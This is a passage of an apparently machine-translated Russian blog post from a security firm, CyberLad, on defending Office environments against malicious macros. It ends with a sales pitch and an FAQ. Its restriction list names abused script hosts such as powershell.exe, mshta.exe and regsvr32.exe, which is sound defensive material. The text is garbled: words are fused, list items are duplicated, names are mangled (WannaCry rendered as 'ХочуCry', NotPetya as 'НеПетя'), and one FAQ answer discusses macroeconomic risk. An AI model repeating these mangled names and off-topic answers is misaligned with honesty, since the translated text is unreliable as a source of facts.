- «Включите защищенный просмотр для файлов, расположенных в потенциально небезопасных местах».
- «Включить защищенный просмотр для файлов из Интернета»
Это не позволяет пользователям выполнять встроенный код в ненадежных файлах, если они специально не выходят из режима защищенного просмотра.
4. Обучение конечных пользователей по вопросам безопасности
Даже при наличии технического контроля ��ользователи остаютсяключевая цельдля социальной инженерии. Макросы часто доставляются с такими сообщениями, как:
"Этот документ зашифрован. Пожалуйста, разрешите просмотр содержимого".
Основы обучения:
- Имитируйте макрофишинговые атаки с помощью таких инструментов, какГоФишилиСимулятор атак Microsoft
- Проводить ежеквартальнокампании по повышению осведомленности о фишинге на основе макросов
- Приведите реальные примеры нарушений, вызванных неправильным использованием макросов
Обучайте пользователейникогда не включайте макросыво вложениях электронной почты или загруженных документах, если они не исходят отутвержденные внутренние рабочие процессы.
5. Используйте контроль приложений: AppLocker/контроль приложений защитника Microsoft (MDAC)
Злоумышленники часто используютБинарные файлы, живущие за счет земли (LOLBins)например PowerShell, WMI, mshta и certutil, запускаемые из кода макроса.
Предотвращение через AppLocker/MDAC:
- Ограничить выполнение:
- powershell.exe
- wscript.exe, cscript.exe
- mshta.exe
- regsvr32.exe
- powershell.exe
- Принудительное применение макрополитик:
- Разрешить только подписанные макросы
- Блокировать неподписанные или запутанные в Base64 сценарии
- Разрешить только подписанные макросы
MDAC предлагает детальный контроль над тем, какие сценарии и двоичные файлы могут выполняться, даже из надежных приложений, таких как Microsoft Office.
6. Защитите свою электронную почту и шлюзы конечных точек
Поскольку макросы часто попадают в организацию черезэлектронная почта, защита вашей электронной почты имеет решающее значение.
Рекомендации по обеспечению безопасности электронной почты:
- Используйтебезопасные шлюзы электронной почты с поддержкой песочницы:
- Защитник Microsoft для Office 365
- Доказательство TAP
- Целевая защита от угроз Mimecast
- Защитник Microsoft для Office 365
- Удаление или карантин вложений .docm, .xlsm, .pptm
- ИспользуйтеДМАРК,ДКИМиСПФдля проверки электронной почты
- ВключитьАвтоматическая очистка в нулевой час(ZAP) в Microsoft 365 для ретроспективного удаления фишинговых писем
Добавьте инструменты EDR (такие как Defender ATP, CrowdStrike, SentinelOne) для обнаружения необычных процессов, порождаемых Office.
7. Используйте макросы с цифровой подписью и белый список макросов
Если ваш бизнес использует макросы:
- Подпишите внутренние макросы цифровой подписью, используякорпоративный центр сертификации
- Настрой��е Office длязапускать только подписанные макросы
Как:
- Используйте SelfCert.exe для создания тестового сертификата или интеграции с вашей PKI
- В настройках центра управления безопасностью:
- Проверьте«Отключите все макросы, кроме макросов с цифровой подписью».
- Проверьте«Отключите все макросы, кроме макросов с цифровой подписью».
Объедините эт�� сбелый список макросов, позволяя выполнять только предварительно одобренные макросы.
Заключительные мысли
Итак,как макросы представляют угрозу кибербезопасности?Ответ кроется в их двойственной природе. Хотя макросы предназначены для повышения производительности за счет автоматизации задач в Microsoft Office, злоумышленники могут легко использовать их в качестве оружия для доставки программ-вымогателей, троянов удаленного доступа, банковских вредоносных программ и других вредоносных программ.
Как для организаций, так и для частных лиц реальная опасность исходит не от самих макросов, а отнеадекватная политика безопасности, недостаточная осведомленность и плохая видимостьв поведение файлов Office.
В мире, где фишинговые электронные письма и вредоносные вложения являютсяВектор атаки №1, простое нажатие кнопки «Включить контент» может стать началом полномасштабного нарушения.
Ключевые выводы:
- Всегда относитесь к документам с поддержкой макросов (.docm, .xlsm, .pptm) с подозрением
- Реализуйте многоуровневую защиту, включаяУпрочнение ГПО,ЭДР,песочницаиобучение пользователей
- Отключите макросы, если это необходимо, и используйтеподписание макросов и внесение в белый списокгде необходимо
- Внимательно отслеживайте поведение приложений Office, особенно когда они порождают механизмы сценариев, такие как PowerShell или MSHTA
Нужна помощь в обеспечении безопасности офисной среды?
Беспокоитесь о том, какую угрозу кибербезопасности вашей организации представляют макросы?
Не оставляйте свои системы уязвимыми для одного клика.
- Получитебесплатный аудит поверхности макроатак
- Выявление рабочих процессов и поведения пользователей с высоким уровнем риска
- Получите практические рекомендации по усилению защиты для Microsoft 365
Свяжитесь со службой безопасности CyberLad и сделайте первый шаг к устранению этого критического пробела в вашей системе безопасности.
Часто задаваемые вопросы
Является ли включение макросов угрозой кибербезопасности?
Да. Включение макросов в файлах Microsoft Office может привести к автоматическому запуску вредоносного кода, что приведет к краже данных, компрометации системы или заражению вредоносными программам��, такими как программы-вымогатели, кейлоггеры или трояны. Макросы часто используются в фишинговых кампаниях, чтобы инициировать первый этап кибератаки.
Каковы самые крупные кибератаки в истории?
Стакснетнацелен на ядерную программу Ирана и считается первым цифровым оружием против физической инфраструкту��ы.
ХочуCryс помощью программ-вымогателей пострадало более 200 000 компьютеров по всему миру.
НеПетяпричинил ущерб на сумму более 10 миллиардов долларов из-за разрушительного вредоносного ПО, маскирующегося под программы-вымогатели.
Каковы основные макроэкономические риски?
Макроэкономические риски включают нестабильность мировой торговли, геополитическую напряженность, волатильность рынка капитала, протекционизм и изменения в глобальной экономической мощи. Это масштабные проблемы, которые могут дестабилизировать экономику, промышленность и международный бизнес.
Где начинаются 90% киберинцидентов?
Более 90% успешных кибератак начинаются с фишинговых писем. Эти электронные письма обманом заставляют пользователей переходить по вредоносным ссылкам, открывать зараженные вложения (часто с поддержкой макросов) или раскрывать конфиденциальную информацию, такую как пароли или личные данные.
Что включает в себя 80% кибератак?
Более 80% взломов связаны со слабыми или украденными паролями. В сочетании с другими рисками, такими как фишинг и вредоносное ПО на основе макросов, плохая гигиена паролей позволяет злоумышленникам повышать привилегии и перемещаться по сетям.
